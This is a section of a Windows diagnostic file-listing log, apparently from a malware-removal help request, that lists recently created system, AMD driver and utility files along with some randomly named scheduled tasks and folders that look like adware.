2016-04-15 17:10 - 2016-03-16 06:03 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-15 17:10 - 2016-03-16 06:00 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 01416192 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:46 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:44 - 01016832 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-04-15 17:10 - 2016-03-16 05:41 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00931840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 03363328 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-15 17:10 - 2016-03-16 05:38 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 01521664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 01794560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-15 17:10 - 2016-03-16 05:34 - 01871872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-15 17:10 - 2016-03-16 05:32 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:28 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:27 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:21 - 18796544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:20 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 03680256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:16 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:12 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:11 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:10 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-15 16:58 - 2016-04-15 16:58 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 18:21 - 2016-04-15 18:00 - 00000000 ____D C:\WINDOWS\Panther
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-11 23:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-11 15:49 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-11 13:27 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-10 22:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:55 - 2016-04-10 21:55 - 00002099 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-10 17:32 - 00002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-10 17:32 - 00002205 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-05 09:41 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-05 08:47 - 2016-04-05 08:47 - 00365824 _____ C:\WINDOWS\system32\ativvaxy_el_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00322612 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00320944 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00264736 _____ C:\WINDOWS\system32\ativvaxy_stn_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00260640 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00254804 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00251856 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00857576 _____ C:\WINDOWS\system32\amdicdxx.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00234292 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00232496 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00177280 _____ C:\WINDOWS\system32\ativce03.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00175584 _____ C:\WINDOWS\system32\amde31a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34b.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00100832 _____ C:\WINDOWS\system32\ativce02.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00009184 _____ C:\WINDOWS\system32\AMDKernelEvents.man
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\SysWOW64\amd-vulkan32.json
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\system32\amd-vulkan64.json
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-04-01 10:14 - 2016-04-10 20:40 - 00000000 ____D C:\Program Files (x86)\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 20:34 - 00014860 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
2016-04-01 10:14 - 2016-04-01 20:34 - 00014834 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
2016-04-01 10:14 - 2016-04-01 20:34 - 00003924 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\Users\Public\Documents\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\ProgramData\eAHPeNhIUJ
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt
2016-03-30 13:15 - 2016-03-30 13:15 - 00015110 _____ C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
2016-03-30 13:12 - 2016-03-30 13:12 - 00004200 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
